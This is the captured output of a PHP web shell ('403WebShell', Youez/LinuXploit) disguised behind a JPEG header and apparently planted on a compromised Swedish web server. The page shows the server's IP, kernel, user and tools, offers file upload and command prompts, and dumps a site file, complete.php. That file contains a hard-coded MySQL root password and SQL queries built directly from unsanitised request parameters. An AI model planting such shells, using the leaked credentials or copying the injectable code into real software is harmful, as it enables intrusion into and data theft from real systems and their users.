????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.222.48.95
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/tekniskaverken/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/appsrv.astacus.se/tekniskaverken/complete.php
<?php
session_start();

if( (trim($_SESSION['DRIFT_SSO_INFO'])=='' )){
			header('location: http://www.driftinfo-online.se/site');
	}

$customerId = $_SESSION['DRIFT_SSO_INFO'][1];

$link = mysql_connect ("localhost", "root", "root123");
		mysql_select_db ("driftinfo");
		
		
		
		if($_GET['action'] == "update"){
			$count = $_GET['count'];
			$dataId = $_GET['dataId'];
			
			$sql = "DELETE FROM tblPosition WHERE dataId = $dataId";
				mysql_query($sql);
				
				
			for ($i = 1; $i <= $count; $i++) {
				$icon = $_GET['icon'.$i.''];
				$position = $_GET['position'.$i.''];
				$title = $_GET['title'.$i.''];
				
	
				$sql = "INSERT INTO tblPosition VALUES(NULL,'$customerId','$dataId','$position','$icon')";
				mysql_query($sql);
			}
			
			header("Location: edit.php#l".$dataId."?info=klart");
		
		}else{
						$count = $_GET['count'];
			$occurredDate = date("Y-m-d H:i:s");
			$occurred = $_SESSION['values'][0];
			$status = $_SESSION['values'][1];
			$text = $_SESSION['values'][3];
			$address = $_SESSION['values'][2];
			
			$sql = "INSERT INTO tblData VALUES(NULL,'$customerId','$occurredDate','$occurred','$status','$text','$address');";
			$result = mysql_query($sql);
			//	echo($sql."<br>");
			$dataId = mysql_insert_id();
				
			for ($i = 1; $i <= $count; $i++) {
				$icon = $_GET['icon'.$i.''];
				$position = $_GET['position'.$i.''];
				$title = $_GET['title'.$i.''];
				
				$sql = "INSERT INTO tblPosition VALUES(NULL,'$customerId','$dataId','$position','$icon')";
				//echo($sql."<br>");
				$result = mysql_query($sql);
			}
			
			header("Location: start.php?info=klart");

		}
        
		
        
?>

Youez - 2016 - github.com/yon3zu
LinuXploit